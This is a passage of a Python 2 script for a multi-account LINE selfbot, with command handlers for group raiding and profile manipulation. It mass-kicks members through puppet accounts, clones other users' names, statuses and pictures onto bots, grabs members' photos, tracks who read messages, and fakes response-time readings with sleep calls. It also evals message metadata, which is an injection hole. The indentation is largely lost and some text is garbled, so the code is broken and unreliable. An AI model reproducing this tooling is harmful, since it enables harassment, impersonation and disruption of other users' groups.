cl.sendText(msg.to,"The automatic appending information is set as follows。\n\n" + wait["message"])
elif "Comment:" in msg.text:
c = msg.text.replace("Comment:","")
if c in [""," ","\n",None]:
cl.sendText(msg.to,"message changed")
else:
wait["comment"] = c
cl.sendText(msg.to,"changed\n\n" + c)
elif "Add comment:" in msg.text:
c = msg.text.replace("Add comment:","")
if c in [""," ","\n",None]:
cl.sendText(msg.to,"String that can not be changed")
else:
wait["comment"] = c
cl.sendText(msg.to,"changed\n\n" + c)
#-----------------------------------------------
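# Backup flags: "Backup:on" only arms the feature. The "BotN backup run"
# handlers further down snapshot each account's profile to text files, and
# the "BotN backup" handlers restore from those files.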
elif msg.text in ["Backup:on"]:
if msg.from_ in admin:
if wait["Backup"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"backup has been active\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"backup has been enable\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["Backup"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"backup has been active\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"backup has been enable\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Backup:off"]:
if msg.from_ in admin:
if wait["Backup"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"backup has been unactive\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"backup has been desable\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["Backup"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"backup has been unactive\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"backup has been desable\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Rejectall"]:
if msg.from_ in admin:
gid = cl.getGroupIdsInvited()
for i in gid:
cl.rejectGroupInvitation(i)
if wait["lang"] == "JP":
cl.sendText(msg.to,"All Invites has been Rejected")
else:
cl.sendText(msg.to,"?????????")
#---------------------Sc invite owner ke group------
elif "Asupka: " in msg.text:
if msg.from_ in owner:
gid = msg.text.replace("Asupka: ","")
if gid == "":
cl.sendText(msg.to,"Invalid group id")
else:
try:
cl.findAndAddContactsByMid(msg.from_)
cl.inviteIntoGroup(gid,[msg.from_])
except:
cl.sendText(msg.to,"Mungkin saya tidak di dalaam grup itu")
#--------===---====--------------
elif msg.text in ["コメント:オン","Comment on","Comment:on","自動首é ?留言:開"]:
if msg.from_ in admin:
if wait["commentOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"already on")
else:
wait["commentOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"�了开。")
elif msg.text in ["コメント:オフ","Comment off","comment off","自動首é ?留言:關"]:
if wait["commentOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"already off")
else:
wait["commentOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"è¦?了关æ–。")
elif msg.text in ["Comment","留言確�"]:
cl.sendText(msg.to,"message changed to\n\n" + str(wait["comment"]))
elif msg.text in ["Gurl"]:
if msg.from_ in admin:
if msg.toType == 2:
x = cl.getGroup(msg.to)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
cl.updateGroup(x)
gurl = cl.reissueGroupTicket(msg.to)
cl.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can't be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Cv1 gurl"]:
if msg.toType == 2:
x = cl.getGroup(msg.to)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
ki.updateGroup(x)
gurl = ki.reissueGroupTicket(msg.to)
ki.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can't be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Cv2 gurl"]:
if msg.toType == 2:
x = cl.getGroup(msg.to)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
kk.updateGroup(x)
gurl = kk.reissueGroupTicket(msg.to)
kk.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can't be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Cv3 gurl"]:
if msg.toType == 2:
x = cl.getGroup(msg.to)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
kc.updateGroup(x)
gurl = kc.reissueGroupTicket(msg.to)
kc.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can't be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Comment bl "]:
wait["wblack"] = True
cl.sendText(msg.to,"add to comment bl")
elif msg.text in ["Comment wl "]:
wait["dblack"] = True
cl.sendText(msg.to,"wl to comment bl")
elif msg.text in ["Comment bl confirm"]:
if wait["commentBlack"] == {}:
cl.sendText(msg.to,"confirmed")
else:
cl.sendText(msg.to,"Blacklist")
mc = ""
for mi_d in wait["commentBlack"]:
mc += "" +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
#-------------Fungsi Jam on/off Start-------------------#
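# The clock feature appends the current (%H:%M) to bot 4's display name.
# There is no scheduler here, so "Jam Update" re-stamps the name manually.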
elif msg.text in ["Jam on"]:
if msg.from_ in admin:
if wait["clock"] == True:
kc.sendText(msg.to,"Bot 4 jam on")
else:
wait["clock"] = True
now2 = datetime.now()
nowT = datetime.strftime(now2,"(%H:%M)")
profile = kc.getProfile()
profile.displayName = wait["cName4"] + nowT
kc.updateProfile(profile)
kc.sendText(msg.to,"Jam Selalu On")
elif msg.text in ["Jam off"]:
if msg.from_ in admin:
if wait["clock"] == False:
kc.sendText(msg.to,"Bot 4 jam off")
else:
wait["clock"] = False
kc.sendText(msg.to,"Jam Sedang Off")
#-------------Fungsi Jam on/off Finish-------------------#
#-------------Fungsi Change Clock Start------------------#
elif msg.text in ["Change clock"]:
n = msg.text.replace("Change clock","")
if len(n.decode("utf-8")) > 13:
cl.sendText(msg.to,"changed")
else:
wait["cName"] = n
cl.sendText(msg.to,"changed to\n\n" + n)
#-------------Fungsi Change Clock Finish-----------------#
#-------------Fungsi Jam Update Start---------------------#
elif msg.text in ["Jam Update"]:
if wait["clock"] == True:
now2 = datetime.now()
nowT = datetime.strftime(now2,"(%H:%M)")
profile = kc.getProfile()
profile.displayName = wait["cName4"] + nowT
kc.updateProfile(profile)
kc.sendText(msg.to,"Sukses update")
else:
kc.sendText(msg.to,"Aktifkan jam terlebih dulu")
#-------------Fungsi Jam Update Finish-------------------#
#========================================
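# channel.getCover appears to return the target's cover photo URL. Members
# are matched by exact display name, so every member sharing that name is hit.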
elif "Steal cover @" in msg.text:
if msg.from_ in admin:
print "[Command]dp executing"
_name = msg.text.replace("Steal cover @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
cu = cl.channel.getCover(target)
path = str(cu)
cl.sendImageWithURL(msg.to, path)
except:
pass
print "[Command]dp executed"
elif "Midpict:" in msg.text:
if msg.from_ in admin:
umid = msg.text.replace("Midpict:","")
contact = cl.getContact(umid)
try:
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
except:
image = "https://www.1and1.co.uk/digitalguide/fileadmin/DigitalGuide/Teaser/not-found-t.jpg"
try:
cl.sendImageWithURL(msg.to,image)
except Exception as error:
cl.sendText(msg.to,(error))
pass
elif "Steal pict " in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
msg.contentType = 0
steal0 = msg.text.replace("Steal pict ","")
steal1 = steal0.lstrip()
steal2 = steal1.replace("@","")
steal3 = steal2.rstrip()
_name = steal3
group = cl.getGroup(msg.to)
targets = []
for g in group.members:
if _name == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
try:
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
except:
image = "https://www.1and1.co.uk/digitalguide/fileadmin/DigitalGuide/Teaser/not-found-t.jpg"
try:
cl.sendImageWithURL(msg.to,image)
except Exception as error:
cl.sendText(msg.to,(error))
pass
except:
cl.sendText(msg.to,"Error!")
break
else:
cl.sendText(msg.to,"Tidak bisa dilakukan di luar grup")
#===============================================
elif msg.text in ["debug speed","Debug speed"]:
if msg.from_ in admin:
cl.sendText(msg.to, "Measuring...")
start = time.time()
time.sleep(0.0001)
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
print "[Command]Speed palsu executed"
elif msg.text in ["zzz","Bot speed"]:
if msg.from_ in admin:
cl.sendText(msg.to, "Measuring...")
start = time.time()
time.sleep(0.00009)
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
print "[Command]Speed palsu executed"
elif "Speed respon" in msg.text:
if msg.from_ in admin:
cl.sendText(msg.to, "Measuring...")
start = time.time()
time.sleep(0.0001)
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
print "[Command]Speed palsu executed"
elif "Sp turunin" in msg.text:
if msg.from_ in admin:
cl.sendText(msg.to, "Sek lurr")
start = time.time()
time.sleep(0.02)
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
print "[Command]Speed palsu executed"
elif "Sp naikin" in msg.text:
if msg.from_ in admin:
cl.sendText(msg.to, "Sek lurr")
start = time.time()
time.sleep(0.1)
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
print "[Command]Speed palsu executed"
elif "Turun lagi" in msg.text:
if msg.from_ in admin:
cl.sendText(msg.to, "Sek lurr")
start = time.time()
time.sleep(0.5)
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
print "[Command]Speed palsu executed"
elif "Spbot" in msg.text:
if msg.from_ in admin:
time.sleep(0.5)
cl.sendText(msg.to, "Sek lurr")
start = time.time()
time.sleep(2.32)
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
print "[Command]Speed palsu executed"
elif msg.text in ["Sp asli"]:
if msg.from_ in admin:
start = time.time()
cl.sendText(msg.to, "Sek")
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
print "[Command]Speed asli executed"
elif msg.text in ["Speedbot","speedbot"]:
if msg.from_ in admin:
start = time.time()
cl.sendText(msg.to, "loading...................")
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
ki.sendText(msg.to, "%sseconds" % (elapsed_time))
kk.sendText(msg.to, "%sseconds" % (elapsed_time))
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
#========================================
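# Each "BotN backup run" snapshots the account's display name, status
# message and picture status hash into three ad-hoc .txt files. The file
# names differ per bot and must match the restore handlers further down.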
elif msg.text in ["Bot1 backup run"]:
if msg.from_ in admin:
wek = cl.getContact(mid)
a = wek.pictureStatus
r = wek.displayName
i = wek.statusMessage
s = open('mydn.txt',"w")
s.write(r)
s.close()
t = open('mysm.txt',"w")
t.write(i)
t.close()
u = open('myps.txt',"w")
u.write(a)
u.close()
cl.sendText(msg.to, "backup has been active")
print wek
print a
print r
print i
elif msg.text in ["Bot2 backup run"]:
if msg.from_ in admin:
wek = ki.getContact(Amid)
a = wek.pictureStatus
r = wek.displayName
i = wek.statusMessage
s = open('mgydn.txt',"w")
s.write(r)
s.close()
t = open('myesm.txt',"w")
t.write(i)
t.close()
u = open('mypfs.txt',"w")
u.write(a)
u.close()
ki.sendText(msg.to, "backup has been active")
print wek
print a
print r
print i
elif msg.text in ["Bot3 backup run"]:
if msg.from_ in admin:
wek = kk.getContact(Bmid)
a = wek.pictureStatus
r = wek.displayName
i = wek.statusMessage
s = open('msgydn.txt',"w")
s.write(r)
s.close()
t = open('mysfdgm.txt',"w")
t.write(i)
t.close()
u = open('gymyps.txt',"w")
u.write(a)
u.close()
kk.sendText(msg.to, "backup has been active")
print wek
print a
print r
print i
elif msg.text in ["Bot4 backup run"]:
if msg.from_ in admin:
wek = kc.getContact(Cmid)
a = wek.pictureStatus
r = wek.displayName
i = wek.statusMessage
s = open('jhmydn.txt',"w")
s.write(r)
s.close()
t = open('myhfsm.txt',"w")
t.write(i)
t.close()
u = open('mypfhs.txt',"w")
u.write(a)
u.close()
kc.sendText(msg.to, "backup has been active")
print wek
print a
print r
print i
elif msg.text in ["Bot5 backup run"]:
if msg.from_ in admin:
wek = ks.getContact(Dmid)
a = wek.pictureStatus
r = wek.displayName
i = wek.statusMessage
s = open('madydn.txt',"w")
s.write(r)
s.close()
t = open('mysgjm.txt',"w")
t.write(i)
t.close()
u = open('myrdps.txt',"w")
u.write(a)
u.close()
ks.sendText(msg.to, "backup has been active")
print wek
print a
print r
print i
elif msg.text in ["Bot6 backup run"]:
if msg.from_ in admin:
wek = k1.getContact(Emid)
a = wek.pictureStatus
r = wek.displayName
i = wek.statusMessage
s = open('mydnsgv.txt',"w")
s.write(r)
s.close()
t = open('jhmysm.txt',"w")
t.write(i)
t.close()
u = open('myiyps.txt',"w")
u.write(a)
u.close()
k1.sendText(msg.to, "backup has been active")
print wek
print a
print r
print i
#----------------------------------------------
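# The clone commands copy a mentioned user's display name, status message
# and picture status onto the chosen bot account. Passing the pictureStatus
# hash to updateProfilePicture relies on the client library accepting a hash
# rather than a local image path; if it expects a path, that step will fail.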
elif "Bot1 clone " in msg.text:
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
contact = cl.getContact(target)
X = contact.displayName
profile = cl.getProfile()
profile.displayName = X
cl.updateProfile(profile)
cl.sendText(msg.to, "Success...")
#---------------------------------------
Y = contact.statusMessage
lol = cl.getProfile()
lol.statusMessage = Y
cl.updateProfile(lol)
#---------------------------------------
P = contact.pictureStatus
cl.updateProfilePicture(P)
except Exception as e:
cl.sendText(msg.to, "Failed!")
print e
elif "Bot2 clone " in msg.text:
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
contact = ki.getContact(target)
X = contact.displayName
profile = ki.getProfile()
profile.displayName = X
ki.updateProfile(profile)
ki.sendText(msg.to, "Success...")
#---------------------------------------
Y = contact.statusMessage
lol = ki.getProfile()
lol.statusMessage = Y
ki.updateProfile(lol)
#---------------------------------------
P = contact.pictureStatus
ki.updateProfilePicture(P)
except Exception as e:
ki.sendText(msg.to, "Failed!")
print e
elif "Bot3 clone " in msg.text:
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
contact = kk.getContact(target)
X = contact.displayName
profile = kk.getProfile()
profile.displayName = X
kk.updateProfile(profile)
kk.sendText(msg.to, "Success...")
#---------------------------------------
Y = contact.statusMessage
lol = kk.getProfile()
lol.statusMessage = Y
kk.updateProfile(lol)
#---------------------------------------
P = contact.pictureStatus
kk.updateProfilePicture(P)
except Exception as e:
kk.sendText(msg.to, "Failed!")
print e
elif "Bot4 clone " in msg.text:
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
contact = kc.getContact(target)
X = contact.displayName
profile = kc.getProfile()
profile.displayName = X
kc.updateProfile(profile)
kc.sendText(msg.to, "Success...")
#---------------------------------------
Y = contact.statusMessage
lol = kc.getProfile()
lol.statusMessage = Y
kc.updateProfile(lol)
#---------------------------------------
P = contact.pictureStatus
kc.updateProfilePicture(P)
except Exception as e:
kc.sendText(msg.to, "Failed!")
print e
elif "Bot5 clone " in msg.text:
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
contact = ks.getContact(target)
X = contact.displayName
profile = ks.getProfile()
profile.displayName = X
ks.updateProfile(profile)
ks.sendText(msg.to, "Success...")
#---------------------------------------
Y = contact.statusMessage
lol = ks.getProfile()
lol.statusMessage = Y
ks.updateProfile(lol)
#---------------------------------------
P = contact.pictureStatus
ks.updateProfilePicture(P)
except Exception as e:
ks.sendText(msg.to, "Failed!")
print e
elif "Bot6 clone " in msg.text:
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
contact = k1.getContact(target)
X = contact.displayName
profile = k1.getProfile()
profile.displayName = X
k1.updateProfile(profile)
k1.sendText(msg.to, "Success...")
#---------------------------------------
Y = contact.statusMessage
lol = k1.getProfile()
lol.statusMessage = Y
k1.updateProfile(lol)
#---------------------------------------
P = contact.pictureStatus
k1.updateProfilePicture(P)
except Exception as e:
k1.sendText(msg.to, "Failed!")
print e
#=================================================
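# Restore counterparts of "BotN backup run": read the three .txt snapshots
# back and reapply name, status message and profile picture.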
elif "Bot1 backup" in msg.text:
if msg.from_ in admin:
try:
h = open('mydn.txt',"r")
name = h.read()
h.close()
x = name
profile = cl.getProfile()
profile.displayName = x
cl.updateProfile(profile)
i = open('mysm.txt',"r")
sm = i.read()
i.close()
y = sm
cak = cl.getProfile()
cak.statusMessage = y
cl.updateProfile(cak)
j = open('myps.txt',"r")
ps = j.read()
j.close()
p = ps
cl.updateProfilePicture(p)
cl.sendText(msg.to, "Succes")
except Exception as e:
cl.sendText(msg.to,"Gagagl!")
print e
elif "Bot2 backup" in msg.text:
if msg.from_ in admin:
try:
h = open('mgydn.txt',"r")
name = h.read()
h.close()
x = name
profile = ki.getProfile()
profile.displayName = x
ki.updateProfile(profile)
i = open('myesm.txt',"r")
sm = i.read()
i.close()
y = sm
cak = ki.getProfile()
cak.statusMessage = y
ki.updateProfile(cak)
j = open('mypfs.txt',"r")
ps = j.read()
j.close()
p = ps
ki.updateProfilePicture(p)
ki.sendText(msg.to, "Succes")
except Exception as e:
ki.sendText(msg.to,"Gagagl!")
print e
elif "Bot3 backup" in msg.text:
if msg.from_ in admin:
try:
h = open('msgydn.txt',"r")
name = h.read()
h.close()
x = name
profile = kk.getProfile()
profile.displayName = x
kk.updateProfile(profile)
i = open('mysfdgm.txt',"r")
sm = i.read()
i.close()
y = sm
cak = kk.getProfile()
cak.statusMessage = y
kk.updateProfile(cak)
j = open('gymyps.txt',"r")
ps = j.read()
j.close()
p = ps
kk.updateProfilePicture(p)
kk.sendText(msg.to, "Succes")
except Exception as e:
kk.sendText(msg.to,"Gagagl!")
print e
elif "Bot4 backup" in msg.text:
if msg.from_ in admin:
try:
h = open('jhmydn.txt',"r")
name = h.read()
h.close()
x = name
profile = kc.getProfile()
profile.displayName = x
kc.updateProfile(profile)
i = open('myhfsm.txt',"r")
sm = i.read()
i.close()
y = sm
cak = kc.getProfile()
cak.statusMessage = y
kc.updateProfile(cak)
j = open('mypfhs.txt',"r")
ps = j.read()
j.close()
p = ps
kc.updateProfilePicture(p)
kc.sendText(msg.to, "Succes")
except Exception as e:
kc.sendText(msg.to,"Gagagl!")
print e
elif "Bot5 backup" in msg.text:
if msg.from_ in admin:
try:
h = open('madydn.txt',"r")
name = h.read()
h.close()
x = name
profile = ks.getProfile()
profile.displayName = x
ks.updateProfile(profile)
i = open('mysgjm.txt',"r")
sm = i.read()
i.close()
y = sm
cak = ks.getProfile()
cak.statusMessage = y
ks.updateProfile(cak)
j = open('myrdps.txt',"r")
ps = j.read()
j.close()
p = ps
ks.updateProfilePicture(p)
ks.sendText(msg.to, "Succes")
except Exception as e:
ks.sendText(msg.to,"Gagagl!")
print e
elif "Bot6 backup" in msg.text:
if msg.from_ in admin:
try:
h = open('mydnsgv.txt',"r")
name = h.read()
h.close()
x = name
profile = k1.getProfile()
profile.displayName = x
k1.updateProfile(profile)
i = open('jhmysm.txt',"r")
sm = i.read()
i.close()
y = sm
cak = k1.getProfile()
cak.statusMessage = y
k1.updateProfile(cak)
j = open('myiyps.txt',"r")
ps = j.read()
j.close()
p = ps
k1.updateProfilePicture(p)
k1.sendText(msg.to, "Succes")
except Exception as e:
k1.sendText(msg.to,"Gagagl!")
print e
#=================================================
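# Read tracking: "Cctv" stores the current message id as a read point in
# wait2; a receipt handler elsewhere in this script presumably fills
# readMember/ROM as members read past that point, and "Toong"/"Intip"
# report who did.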
elif msg.text == "Cctv":
if msg.from_ in admin:
cl.sendText(msg.to, "Cek CCTV di proses......")
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
except:
pass
now2 = datetime.now()
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.strftime(now2,"%H:%M")
wait2['ROM'][msg.to] = {}
#print wait2
elif msg.text == "Toong":
if msg.from_ in admin:
if msg.to in wait2['readPoint']:
if wait2["ROM"][msg.to].items() == []:
chiya = ""
else:
chiya = ""
for rom in wait2["ROM"][msg.to].items():
#print rom
chiya += rom[1] + "\n"
cl.sendText(msg.to, "||Di Read Oleh||%s\n||By : ????+? ? ¥ûDÏ ? ?+????||\n\n>Pelaku CCTV<\n%s-=CCTV=-\n•Bintitan\n•Panuan\n•Kurapan\n•Kudisan\n\nAmiin Ya Allah\n[%s]" % (wait2['readMember'][msg.to],chiya,setTime[msg.to]))
else:
cl.sendText(msg.to, "Ketik Cctv dulu Koplak\nBaru Ketik Toong\nDASAR PIKUN ?")
elif msg.text == "Cctv":
if msg.from_ in admin:
cl.sendText(msg.to, "Siap di intip....")
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
except:
pass
now2 = datetime.now()
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.strftime(now2,'%Y-%m-%d %H:%M:%S')
wait2['ROM'][msg.to] = {}
print "[Command] Reset"
elif msg.text == "Intip":
if msg.from_ in admin:
if msg.to in wait2['readPoint']:
if wait2["ROM"][msg.to].items() == []:
chiya = ""
else:
chiya = ""
for rom in wait2["ROM"][msg.to].items():
print "[Command] Check"
chiya += rom[1] + "\n"
cl.sendText(msg.to, "? ? ???+? ? ¥ûDÏ ? ?+??? ?\nRead : %s\n\n? Sider :\n%s\nPoint creation date n time:\n[%s]" % (wait2['readMember'][msg.to],chiya,setTime[msg.to]))
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
except:
pass
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
now2 = datetime.now()
wait2['setTime'][msg.to] = datetime.strftime(now2,'%Y-%m-%d %H:%M:%S')
wait2['ROM'][msg.to] = {}
print "[Command] reset"
else:
cl.sendText(msg.to,"Read point tidak tersedia, Silahkan ketik Cctv untuk membuat Read point.")
#-----------------------------------------------
#---------------FUNGSI RATAIN GRUP TANPA KICK SESAMA BOT/Admin/Bots----------#
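# Cleanse kicks every member whose display name contains the given fragment
# (an empty fragment matches everyone), skipping mids listed in Bots and
# admin, and spreads the kicks across random clients to avoid rate limits.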
elif "Cleanse" in msg.text:
if msg.from_ in owner:
if msg.toType == 2:
print "ok cleanse"
_name = msg.text.replace("Cleanse","")
# One group fetch is enough; the original redundantly fetched the same
# group once per client.
gs = cl.getGroup(msg.to)
cl.sendText(msg.to,"Just some casual cleansing ")
targets = []
for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"you are not admin")
else:
for target in targets:
if not target in Bots:
if not target in admin:
try:
klist=[ki,kk,kc,ks,k1,k2,k3,k4,k5,k6,k7,k8,k9,k10,k11,k12,k13,k14,k15]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
cl.sendText(msg.to,"Group cleanse")
#-----------------------------------------------
            #----------------Join Group Function Start-----------------------#
            elif msg.text in ["1","hay"]: # summon every bot into the group
if msg.from_ in owner:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
                bots = [ki, kk, kc, ks, k1, k2, k3, k4, k5, k6, k7, k8, k9, k10,
                        k11, k12, k13, k14, k15, k16, k17, k18, k19, k20]
                for bot in bots:
                    bot.acceptGroupInvitationByTicket(msg.to, Ticket)
                    time.sleep(0.01)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
cl.updateGroup(G)
print "Semua Sudah Lengkap"
elif msg.text in ["Kampret join"]:
                if msg.from_ in admin:
x = ki.getGroup(msg.to)
x.preventJoinByTicket = False
ki.updateGroup(x)
invsend = 0
Ti = ki.reissueGroupTicket(msg.to)
cl.acceptGroupInvitationByTicket(msg.to,Ti)
G = ki.getGroup(msg.to)
G.preventJoinByTicket = True
ki.updateGroup(G)
Ticket = ki.reissueGroupTicket(msg.to)
elif msg.text in ["Luffy join"]:
if msg.from_ in admin:
x = cl.getGroup(msg.to)
x.preventJoinByTicket = False
cl.updateGroup(x)
invsend = 0
Ti = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ti)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
cl.updateGroup(G)
Ticket = cl.reissueGroupTicket(msg.to)
elif msg.text in ["Zorro join"]:
if msg.from_ in admin:
x = cl.getGroup(msg.to)
x.preventJoinByTicket = False
cl.updateGroup(x)
invsend = 0
Ti = cl.reissueGroupTicket(msg.to)
kk.acceptGroupInvitationByTicket(msg.to,Ti)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
cl.updateGroup(G)
Ticket = cl.reissueGroupTicket(msg.to)
elif msg.text in ["Sanji Join"]:
if msg.from_ in admin:
X = cl.getGroup(msg.to)
X.preventJoinByTicket = False
cl.updateGroup(X)
invsend = 0
Ti = cl.reissueGroupTicket(msg.to)
kc.acceptGroupInvitationByTicket(msg.to,Ti)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
cl.updateGroup(G)
Ticket = cl.reissueGroupTicket(msg.to)
            #----------------------Join Group Function End---------------#
            #-------------Leave Group Function Start---------------#
            elif msg.text in ["Kabur all","Ampih"]: # every bot leaves the group, including the main bot
if msg.from_ in owner:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
                        for bot in [ki, kk, kc, ks, k1, k2, k3, k4, k5, k6, k7, k8,
                                    k9, k10, k11, k12, k13, k14, k15, k16, k17, k18,
                                    k19, k20]:
                            bot.leaveGroup(msg.to)
                        cl.leaveGroup(msg.to)
except:
pass
elif msg.text in ["moleh"]: #Semua Bot Ninggalin Group Kecuali Bot Induk
if msg.from_ in owner:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
                        # cl (the main bot) and kk deliberately stay behind
                        for bot in [ki, kc, ks, k1, k2, k3, k4, k5, k6, k7, k8, k9,
                                    k10, k11, k12, k13, k14, k15, k16, k17, k18,
                                    k19, k20]:
                            bot.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Bye zorro"]:
if msg.from_ in owner:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Bye sanji"]:
if msg.from_ in owner:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
kk.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Bye Ussop"]:
if msg.from_ in owner:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
kc.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Ojo koyo kuwe1"]:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Ojo koyo kuwe2"]:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
kk.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Ojo koyo kuwe3"]:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
kc.leaveGroup(msg.to)
except:
pass
            #-------------Leave Group Function End---------------#
            #-------------Tag All Function Start---------------#
elif msg.text in ["Emak"]:
if msg.from_ in admin:
group = cl.getGroup(msg.to)
nama = [contact.mid for contact in group.members]
cb = ""
cb2 = ""
strt = int(0)
akh = int(0)
for md in nama:
akh = akh + int(6)
cb += """{"S":"""+json.dumps(str(strt))+""","E":"""+json.dumps(str(akh))+""","M":"""+json.dumps(md)+"},"""
strt = strt + int(7)
akh = akh + 1
cb2 += "@nrik \n"
cb = (cb[:int(len(cb)-1)])
msg.contentType = 0
msg.text = cb2
msg.contentMetadata ={'MENTION':'{"MENTIONEES":['+cb+']}','EMTVER':'4'}
try:
cl.sendMessage(msg)
except Exception as error:
print error
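                # MENTION metadata format: each entry's S/E are character offsets
                # into msg.text and M is the tagged member's mid; "@nrik \n" is 7
                # characters, hence the stride of 7 with the mention covering 6.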
elif msg.text in ["Abah"]:
if msg.from_ in admin:
group = cl.getGroup(msg.to)
nama = [contact.mid for contact in group.members]
                jml = len(nama)
                if jml > 500:
                    cl.sendText(msg.to, 'Member melebihi batas.')
                else:
                    # mention in chunks of 100 (the chunk size the original already
